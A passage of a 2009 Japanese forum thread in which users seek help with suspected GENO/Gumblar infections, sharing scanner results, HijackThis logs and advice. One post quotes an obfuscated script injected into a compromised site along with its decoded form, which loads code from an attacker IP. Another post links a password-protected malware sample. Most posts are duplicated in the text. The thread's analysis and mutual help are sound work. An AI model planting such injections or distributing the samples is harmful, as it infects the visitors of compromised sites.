GmL.exe 受理 2009.04.06 18:04:43 (CET)
ttp://www.virustotal.com/jp/analisis/d2ab3fb2e35d6cc5aaae32e7230a4646
La.zip 受理 2009.04.06 18:32:46 (CET)
ttp://www.virustotal.com/jp/analisis/3dda094319cd06b1fc0175bdaf516e44
パックされたDropper型、McAfeeやSymantecは対応済みらしい
719 : ◆N9P3SuvBPo :2009/04/07(火) 02:15:15
>717
俺、Avast入れてないし、自動更新だって無効に設定してますけど?
電源落すって言ってたけど、環境によってはブルスクになるってあったからな…
俺、Avast入れてないし、自動更新だって無効に設定してますけど?
電源落すって言ってたけど、環境によってはブルスクになるってあったからな…
720 :八頭 ◆YAGApwSaEw :2009/04/07(火) 02:22:59
KillAVだからね・・・(セキュリティソフトやMicrosoft Updateを停める)
a-squaredよりもこっちのほうが良かったかな?
マカフィー・インターネットセキュリティ 2009体験版
ttps://www.storemcafee.jp/mcfs/catalog/campaign_products.php?campaign_id=55&osCsid=iffvt7a7r0h2le5115blm0ctsdtvm8j6
Avastと一時的な共存なら問題無いから(駆除後にマカフィーアンインストール)体験版使う方がいいかもね
検出箇所と検出名は◆N9P3SuvBPoに教えてあげてねw
a-squaredよりもこっちのほうが良かったかな?
マカフィー・インターネットセキュリティ 2009体験版
ttps://www.storemcafee.jp/mcfs/catalog/campaign_products.php?campaign_id=55&osCsid=iffvt7a7r0h2le5115blm0ctsdtvm8j6
Avastと一時的な共存なら問題無いから(駆除後にマカフィーアンインストール)体験版使う方がいいかもね
検出箇所と検出名は◆N9P3SuvBPoに教えてあげてねw
721 :名無しさん@お腹いっぱい。:2009/04/07(火) 02:30:47
>>720
すんません詳しくありがとうございまする
色々慣れないもので・・・・
流れとしては
PCが重くなる→AVG(前から入ってたが自動UPDATE不能に)→たまたまGENOウイルスの存在を知る
怖くなってAVG削除→avastは対応してる?らしいのでインスコ→これも自動UPDATEできず・・・→手動で>>708の状態まで辿り着く
あれ?Microsoft Updateできないや・・・・・→また不安にorz
明日マカフィー入れてスキャンしてみます。
ありがとうございました。
すんません詳しくありがとうございまする
色々慣れないもので・・・・
流れとしては
PCが重くなる→AVG(前から入ってたが自動UPDATE不能に)→たまたまGENOウイルスの存在を知る
怖くなってAVG削除→avastは対応してる?らしいのでインスコ→これも自動UPDATEできず・・・→手動で>>708の状態まで辿り着く
あれ?Microsoft Updateできないや・・・・・→また不安にorz
明日マカフィー入れてスキャンしてみます。
ありがとうございました。
722 : ◆N9P3SuvBPo :2009/04/07(火) 02:39:24
>721
自動更新やBITSが有効でもね、書き換えられていたらENDだよ。
HijackThisすらもDLできないのか…となると残る選択肢はリカバリしか…
自動更新やBITSが有効でもね、書き換えられていたらENDだよ。
HijackThisすらもDLできないのか…となると残る選択肢はリカバリしか…
723 :名無しさん@お腹いっぱい。:2009/04/07(火) 03:51:53
>>721
自動UPDATEできないのならアウトだと思う
自動UPDATEできないのならアウトだと思う
724 :名無しさん@お腹いっぱい。:2009/04/07(火) 14:08:00
【使用OS】 「windows xp sp3」
【使用セキュリティソフトとバージョン】 「ノートン2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「年明けで期限切れ」
スキャンで反応が無かったので開こうと思ったらexe・・・
exeのあるフォルダにexeと同じ名前のフォルダを作ってましたが、
他にどんな動作をしているものなのでしょうか?
*ウイルス注意*
http://www1.axfc.net/uploader/H/so/74041 pass[2ch]
【使用セキュリティソフトとバージョン】 「ノートン2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「年明けで期限切れ」
スキャンで反応が無かったので開こうと思ったらexe・・・
exeのあるフォルダにexeと同じ名前のフォルダを作ってましたが、
他にどんな動作をしているものなのでしょうか?
*ウイルス注意*
http://www1.axfc.net/uploader/H/so/74041 pass[2ch]
725 :名無しさん@お腹いっぱい。:2009/04/07(火) 15:08:25
>>724
おもいっきりクロだった。あとは自分で調べれ
File: exe.exe
Status:
INFECTED/MALWARE
MD5: 6da1bd47cfcdb0de1804ba3d193bdee1
Packers detected:
-
↓各スキャナの結果。未検出だったとこは割愛
Scan taken on 07 Apr 2009 05:45:28 (GMT)
AntiVir
Found TR/Dropper.Gen
Avast
Found Win32:SdBot-gen44
CPsecure
Found Troj.Exploit.W32.IMG-WMF.da
Ikarus
Found Virus.Win32.SdBot.gen44
Sophos Antivirus
Found Mal/Behav-043
よくわからんけど他の不正プログラムを落とすマルウェアみたい
おもいっきりクロだった。あとは自分で調べれ
File: exe.exe
Status:
INFECTED/MALWARE
MD5: 6da1bd47cfcdb0de1804ba3d193bdee1
Packers detected:
-
↓各スキャナの結果。未検出だったとこは割愛
Scan taken on 07 Apr 2009 05:45:28 (GMT)
AntiVir
Found TR/Dropper.Gen
Avast
Found Win32:SdBot-gen44
CPsecure
Found Troj.Exploit.W32.IMG-WMF.da
Ikarus
Found Virus.Win32.SdBot.gen44
Sophos Antivirus
Found Mal/Behav-043
よくわからんけど他の不正プログラムを落とすマルウェアみたい
726 :名無しさん@お腹いっぱい。:2009/04/07(火) 22:18:45
【使用OS】 「Windows 2000」
【Microsoft Update(MU)の状態】 「SP4適用のみ」
【使用セキュリティソフトとバージョン】 「Avira」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「a-squared Free 4.0」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Aviraとa-squared Free 4.0でスキャンしたが何も検出されない」
GENOのサイトへアクセスしたとき、いつもよりページが開くのが遅く、重かったので直ぐに他のページを
開きました。時間を空けてGENOに再びアクセスしたところ、よく覚えていないのですがメッセージの画面が
出て内容も全部読まずに「はい」をクリックしました。
アドビ関係は偶然にも3月の17日に最新版をダウンロードしてインストールしています。
いろんなページに書き込まれていて怖くなりどうすればいいのかわかりません。
【Microsoft Update(MU)の状態】 「SP4適用のみ」
【使用セキュリティソフトとバージョン】 「Avira」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「a-squared Free 4.0」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Aviraとa-squared Free 4.0でスキャンしたが何も検出されない」
GENOのサイトへアクセスしたとき、いつもよりページが開くのが遅く、重かったので直ぐに他のページを
開きました。時間を空けてGENOに再びアクセスしたところ、よく覚えていないのですがメッセージの画面が
出て内容も全部読まずに「はい」をクリックしました。
アドビ関係は偶然にも3月の17日に最新版をダウンロードしてインストールしています。
いろんなページに書き込まれていて怖くなりどうすればいいのかわかりません。
ブラウザはファイアフォックスで再起動してみましたが、何ともありませんでした。
728 :名無しさん@お腹いっぱい。:2009/04/07(火) 22:55:00
【使用OS】 「windows xp sp3」
【使用セキュリティソフトとバージョン】「AVG」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
AVGでは何も検出され
F-Secureでオンラインスキャナしたら
W32/Packed_RPack.Fってのが検出されたんだけど
ググッても情報が何も出てこないんですけど
どなたか情報をください。
【使用セキュリティソフトとバージョン】「AVG」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
AVGでは何も検出され
F-Secureでオンラインスキャナしたら
W32/Packed_RPack.Fってのが検出されたんだけど
ググッても情報が何も出てこないんですけど
どなたか情報をください。
729 : ◆N9P3SuvBPo :2009/04/07(火) 22:58:24
>727
最新版のadobe製品を適用済みとのことなので、そこは大丈夫だと思います。
しかし、メッセージに対して「はい」をクリックしたのは少しひっかかりますけど…
最新版のadobe製品を適用済みとのことなので、そこは大丈夫だと思います。
しかし、メッセージに対して「はい」をクリックしたのは少しひっかかりますけど…
730 : ◆N9P3SuvBPo :2009/04/07(火) 23:03:49
>728
たしかに情報ありませんね。
名前削ったりしてもヒットせず。
検出場所分かります?
あと、もしかしてGENOを踏んでしまったとか?
たしかに情報ありませんね。
名前削ったりしてもヒットせず。
検出場所分かります?
あと、もしかしてGENOを踏んでしまったとか?
731 :名無しさん@お腹いっぱい。:2009/04/07(火) 23:08:07
>>729
ありがとうございます
メッセージは日本語でバックがグレーでした
飛ばし読みですが意味は新しいバージョンがどうのこうのとかいう内容だった
ような気がします。
プロセスエクスプローラなどでも確認しましたが、怪しいものはありませんでした。
ブラウザでアクセスしたときに左下のURLを確認していましたが、見慣れない
アドレスが出ていましたが、飛ばされることはありませんでした。
このまま様子見で大丈夫でしょうか
ありがとうございます
メッセージは日本語でバックがグレーでした
飛ばし読みですが意味は新しいバージョンがどうのこうのとかいう内容だった
ような気がします。
プロセスエクスプローラなどでも確認しましたが、怪しいものはありませんでした。
ブラウザでアクセスしたときに左下のURLを確認していましたが、見慣れない
アドレスが出ていましたが、飛ばされることはありませんでした。
このまま様子見で大丈夫でしょうか
732 :名無しさん@お腹いっぱい。:2009/04/07(火) 23:11:36
>730
http://lapcie.com/index.php?page=AsukaTime
ここのサイトのAsukaTime
Ver 1.0.28 Download
ってやつのexeから検出されたんですけど
わかりますかね?
http://lapcie.com/index.php?page=AsukaTime
ここのサイトのAsukaTime
Ver 1.0.28 Download
ってやつのexeから検出されたんですけど
わかりますかね?
733 :名無しさん@お腹いっぱい。:2009/04/07(火) 23:17:34
【使用OS】 「Windows XP Pro」
【Microsoft Update(MU)の状態】 「自動 下記が未インストール」
Windows Genuine Advantage (正規 Windows 推奨プログラム) 通知ツール (KB905474)
Microsoft .NET Framework 3.5 Service Pack 1 および .NET Framework 3.5 ファミリ更新プログラム (KB951847) x86
【使用セキュリティソフトとバージョン】 「ウィルスバスター 2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001a
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「BBルータ有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_GENOME.BK popup[1].js」
geno騒ぎを聞いたのでチェックしたところ上記がでてきました。
ちなみにIEの履歴には 94.***.***.*** は無し
下記のアクセス履歴が残ってました。
ttp://www.geno-web.jp/Goods/GB09001900
最終表示日時 2009/03/31
ウイルスに感染していますか? acrobatreadは8.1.2なので古いです。
【Microsoft Update(MU)の状態】 「自動 下記が未インストール」
Windows Genuine Advantage (正規 Windows 推奨プログラム) 通知ツール (KB905474)
Microsoft .NET Framework 3.5 Service Pack 1 および .NET Framework 3.5 ファミリ更新プログラム (KB951847) x86
【使用セキュリティソフトとバージョン】 「ウィルスバスター 2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001a
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「BBルータ有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_GENOME.BK popup[1].js」
geno騒ぎを聞いたのでチェックしたところ上記がでてきました。
ちなみにIEの履歴には 94.***.***.*** は無し
下記のアクセス履歴が残ってました。
ttp://www.geno-web.jp/Goods/GB09001900
最終表示日時 2009/03/31
ウイルスに感染していますか? acrobatreadは8.1.2なので古いです。
パターンファイル部書き忘れました
よろしくお願いします。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001
パターンファイル番号 5.949.00
よろしくお願いします。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001
パターンファイル番号 5.949.00
735 : ◆N9P3SuvBPo :2009/04/07(火) 23:23:53
>731
>日本語でグレー
>新しいバージョン
これってもしや、AcrobatもしくはFlashのアップデート通知?
でもAdobe製品が最新ならそんなメッセージが出ないのが普通なんですが…
念の為、HijackThisというツールを落してきて、ログを取って、適当なアップローダーに、
“パス付きで”アップしてれませんか。
HijackThisのダウンロード
↓
ttp://wiki.higaitaisaku.com/wiki.cgi?page=HijackThis+%A5%C0%A5%A6%A5%F3%A5%ED%A1%BC%A5%C9+%28+Trend+Micro+%29
>732
AsukaTime.exeか…
いちおうそのファイルを、VirusTotalでスキャンして、
結果のURLを貼ってくれませんか。
>日本語でグレー
>新しいバージョン
これってもしや、AcrobatもしくはFlashのアップデート通知?
でもAdobe製品が最新ならそんなメッセージが出ないのが普通なんですが…
念の為、HijackThisというツールを落してきて、ログを取って、適当なアップローダーに、
“パス付きで”アップしてれませんか。
HijackThisのダウンロード
↓
ttp://wiki.higaitaisaku.com/wiki.cgi?page=HijackThis+%A5%C0%A5%A6%A5%F3%A5%ED%A1%BC%A5%C9+%28+Trend+Micro+%29
>732
AsukaTime.exeか…
いちおうそのファイルを、VirusTotalでスキャンして、
結果のURLを貼ってくれませんか。
736 : ◆N9P3SuvBPo :2009/04/07(火) 23:29:15
>733
先に聞きますが、SP2かSP3は当ててますよね?
>最終表示日時 2009/03/31
GENOが問題のサイトになってると報告されたのが、4月4日らしいので、
その日以前にアクセスしたということだったら、たぶん大丈夫でしょう。
IEのキャッシュのクリアとクッキーのクリアを行なってください。
先に聞きますが、SP2かSP3は当ててますよね?
>最終表示日時 2009/03/31
GENOが問題のサイトになってると報告されたのが、4月4日らしいので、
その日以前にアクセスしたということだったら、たぶん大丈夫でしょう。
IEのキャッシュのクリアとクッキーのクリアを行なってください。
738 :名無しさん@お腹いっぱい。:2009/04/07(火) 23:31:55
739 : ◆N9P3SuvBPo :2009/04/07(火) 23:39:52
>737
了解です。
>738
うはwwwwwwwwウイルス名から推測するにかなり厄介なタイプと見た。
有名な所もふくめていくつかのベンダーも検知してるので、誤検出の可能性は低いと見た。
素性が全くわからない相手なので(もし分かってたとしても駆除は難しいと思う)、
リカバリをお奨めします。
了解です。
>738
うはwwwwwwwwウイルス名から推測するにかなり厄介なタイプと見た。
有名な所もふくめていくつかのベンダーも検知してるので、誤検出の可能性は低いと見た。
素性が全くわからない相手なので(もし分かってたとしても駆除は難しいと思う)、
リカバリをお奨めします。
740 :名無しさん@お腹いっぱい。:2009/04/07(火) 23:43:14
>739
わかりました〜
ありがとうございました〜
わかりました〜
ありがとうございました〜
>>736
便利そうなものなので こちら(popup.js)もアップしました。
どうも誤検知っぽいですね。
http://www.virustotal.com/jp/analisis/43eb74ec2421691d1e80b9ed4d3cefdb
便利そうなものなので こちら(popup.js)もアップしました。
どうも誤検知っぽいですね。
http://www.virustotal.com/jp/analisis/43eb74ec2421691d1e80b9ed4d3cefdb
742 : ◆N9P3SuvBPo :2009/04/07(火) 23:53:51
>741
はい、こちらは誤検出です。
トレンドが「誤検出だ」と訂正してました。
はい、こちらは誤検出です。
トレンドが「誤検出だ」と訂正してました。
743 :名無しさん@お腹いっぱい。:2009/04/07(火) 23:55:58
744 :名無しさん@お腹いっぱい。:2009/04/08(水) 00:10:16
test
745 : ◆N9P3SuvBPo :2009/04/08(水) 00:14:42
あと1時間起きていられるか分かりません…
746 :名無しさん@お腹いっぱい。:2009/04/08(水) 00:24:44
>>732
AsukaTime.exe 動かしたが何も落ちてこない。ツマンネ
Bit の Peed.Gen の説明見たが、該当箇所のレジストリも改変されてないし、
ファイルのコピーもできてない。モットツマンネ
ttp://www.threatexpert.com/report.aspx?md5=c534ea1d81c337959b39524c0d883c46
AsukaTime.exe 動かしたが何も落ちてこない。ツマンネ
Bit の Peed.Gen の説明見たが、該当箇所のレジストリも改変されてないし、
ファイルのコピーもできてない。モットツマンネ
ttp://www.threatexpert.com/report.aspx?md5=c534ea1d81c337959b39524c0d883c46
747 :名無しさん@お腹いっぱい。:2009/04/08(水) 00:26:24
>>739
ttp://www.virustotal.com/jp/analisis/7d246f0103dc3111c70dc17bc9bf5322
アンパックしたら減った。パッカで検出してんじゃね?
ttp://www.virustotal.com/jp/analisis/7d246f0103dc3111c70dc17bc9bf5322
アンパックしたら減った。パッカで検出してんじゃね?
748 : ◆N9P3SuvBPo :2009/04/08(水) 00:36:56
749 :名無しさん@お腹いっぱい。:2009/04/08(水) 00:56:24
>>738 >>747 の差分
パッカー(6)とヒューリスティック(4)と Peed.Gen(2)
Peed.Genは改変、ドロップなし報告あり。
AhnLab-V3 5.0.0.2 2009.04.07 Win32/MalPackedB.suspicious
Authentium 5.1.2.4 2009.04.07 W32/Heuristic-210!Eldorado
BitDefender 7.2 2009.04.07 Trojan.Peed.Gen
F-Prot 4.4.4.56 2009.04.07 W32/Heuristic-210!Eldorado
GData 19 2009.04.07 Trojan.Peed.Gen
Norman 6.00.06 2009.04.07 W32/Packed_RLPack.F
Panda 10.0.0.14 2009.04.06 Malicious Packer
Prevx1 V2 2009.04.07 High Risk Cloaked Malware
Sophos 4.40.0 2009.04.07 Sus/ComPack-F
Sunbelt 3.2.1858.2 2009.04.06 Trojan.Win32.Packer.RLPack1.18.a (v)
Symantec 1.4.4.12 2009.04.07 Suspicious.MH690.A
VirusBuster 4.6.5.0 2009.04.06 Packed/RLPack
まぁ、心配なら使わないことだな。
パッカー(6)とヒューリスティック(4)と Peed.Gen(2)
Peed.Genは改変、ドロップなし報告あり。
AhnLab-V3 5.0.0.2 2009.04.07 Win32/MalPackedB.suspicious
Authentium 5.1.2.4 2009.04.07 W32/Heuristic-210!Eldorado
BitDefender 7.2 2009.04.07 Trojan.Peed.Gen
F-Prot 4.4.4.56 2009.04.07 W32/Heuristic-210!Eldorado
GData 19 2009.04.07 Trojan.Peed.Gen
Norman 6.00.06 2009.04.07 W32/Packed_RLPack.F
Panda 10.0.0.14 2009.04.06 Malicious Packer
Prevx1 V2 2009.04.07 High Risk Cloaked Malware
Sophos 4.40.0 2009.04.07 Sus/ComPack-F
Sunbelt 3.2.1858.2 2009.04.06 Trojan.Win32.Packer.RLPack1.18.a (v)
Symantec 1.4.4.12 2009.04.07 Suspicious.MH690.A
VirusBuster 4.6.5.0 2009.04.06 Packed/RLPack
まぁ、心配なら使わないことだな。
750 : ◆N9P3SuvBPo :2009/04/08(水) 01:04:55
今日のところはこれで失礼させてもらいますね。
751 :名無しさん@お腹いっぱい。:2009/04/08(水) 02:16:50
752 :名無しさん@お腹いっぱい。:2009/04/08(水) 02:45:10
778 名前: アブラチャン(アラバマ州)[sage] 投稿日:2009/04/08(水) 01:20:59.53 ID:cD+rmH6W
ここもか?
www.naxos.co.jp/_ScriptLibrary/pm.js
最下部
<!--
document.write(unescape('%3CspBscjBrjBispBppHtjB%20srCXHcjB%3DspB%2FpH%2FjB94%2Eze6243y7%2E23y%2E195%2F3yjqze6uerspByCXH%2Ejsze6%3E%3C%2F3ysc3yript3y%3E').replace(/3y|CW|jB|pH|CXH|ze6|spB/g,""));
-->
↓
<script src=//94.247.2.195/jquery.js></script>
ここもか?
www.naxos.co.jp/_ScriptLibrary/pm.js
最下部
<!--
document.write(unescape('%3CspBscjBrjBispBppHtjB%20srCXHcjB%3DspB%2FpH%2FjB94%2Eze6243y7%2E23y%2E195%2F3yjqze6uerspByCXH%2Ejsze6%3E%3C%2F3ysc3yript3y%3E').replace(/3y|CW|jB|pH|CXH|ze6|spB/g,""));
-->
↓
<script src=//94.247.2.195/jquery.js></script>
753 :名無しさん@お腹いっぱい。:2009/04/08(水) 02:51:53
【使用OS】 「XP」
【使用セキュリティソフトとバージョン】 「avast!4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」
タスクバーを見たところ、「wpsupdate.exe」とあり、
最大化してみるとはいといいえのボタンだけで、いいえを押すと消えました
再起動して、タスクバーをみるとやはりありました
当然知らなくて検索してみるとどうやらスパイウェアらしいのです。
怖くなってspybotでスキャンしてみても検出されませんでした
どうすれば良いのでしょうか?
【使用セキュリティソフトとバージョン】 「avast!4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」
タスクバーを見たところ、「wpsupdate.exe」とあり、
最大化してみるとはいといいえのボタンだけで、いいえを押すと消えました
再起動して、タスクバーをみるとやはりありました
当然知らなくて検索してみるとどうやらスパイウェアらしいのです。
怖くなってspybotでスキャンしてみても検出されませんでした
どうすれば良いのでしょうか?
754 :名無しさん@お腹いっぱい。:2009/04/08(水) 09:05:52
ウィルスドロッパーか
初めてお目にかかった サンキュー
初めてお目にかかった サンキュー
755 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:29:36
756 :名無しさん@お腹いっぱい。:2009/04/08(水) 13:03:51
>>735
Adobe Reader 9 のバージョンは 9.0.0.332 でした。
ログは
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:25:24, on 2009/04/08
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal
Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\soft\HiJackThis.exe
Adobe Reader 9 のバージョンは 9.0.0.332 でした。
ログは
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:25:24, on 2009/04/08
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal
Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\soft\HiJackThis.exe
>>735
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKLM\..\Run: [Persistence] C:\WINNT\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKUS\.DEFAULT\..\Run: [Internat.exe] Internat.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [^SetupICWDesktop] C:\Program Files\Internet Explorer\Connection Wizard\icwconn1.exe /desktop (User 'Default user')
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKLM\..\Run: [Persistence] C:\WINNT\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKUS\.DEFAULT\..\Run: [Internat.exe] Internat.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [^SetupICWDesktop] C:\Program Files\Internet Explorer\Connection Wizard\icwconn1.exe /desktop (User 'Default user')
>>735
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1208654512154
O23 - Service: a-squared Free Service (a2free) - Emsi Software GmbH - C:\program files\a2 free\a2service.exe
O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
End of file
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1208654512154
O23 - Service: a-squared Free Service (a2free) - Emsi Software GmbH - C:\program files\a2 free\a2service.exe
O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
End of file
759 :名無しさん@お腹いっぱい。:2009/04/08(水) 13:37:36
GENOのマルウェアってどこもまだ駆除できないの?
フリーセキュリティは最新のものには強いと聞いてたんだけど..
バスターやノートンとかの御三家も無理かな?
フリーセキュリティは最新のものには強いと聞いてたんだけど..
バスターやノートンとかの御三家も無理かな?
760 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:13:41
無理っす
761 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:21:02
手動でOK
762 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:35:47
763 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:52:12
GENO ウイルス に一致する日本語のページ 約 42,800 件中 1 - 50 件目 (0.18 秒)
http://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&num=50
http://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&num=50
764 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:55:17
GENO ウイルスってAdobe Readerの脆弱性をついてくると聞きました。
ですが、もしAdobe Readerをアンインストールしていた場合はどうなるのでしょうか?
ですが、もしAdobe Readerをアンインストールしていた場合はどうなるのでしょうか?
765 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:57:16
766 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:18:37
"GENOウイルス"の検索結果 36 件中 1 - 36 件目 (0.14 秒)
767 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:25:46
GENO ウイルス ニュース検索結果
http://news.google.co.jp/news/search?um=1&ned=jp&hl=ja&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&cf=all&scoring=n
http://news.google.co.jp/news/search?um=1&ned=jp&hl=ja&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&cf=all&scoring=n
768 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:41:01
先日お世話になった>>690です。その節はありがとうございました。
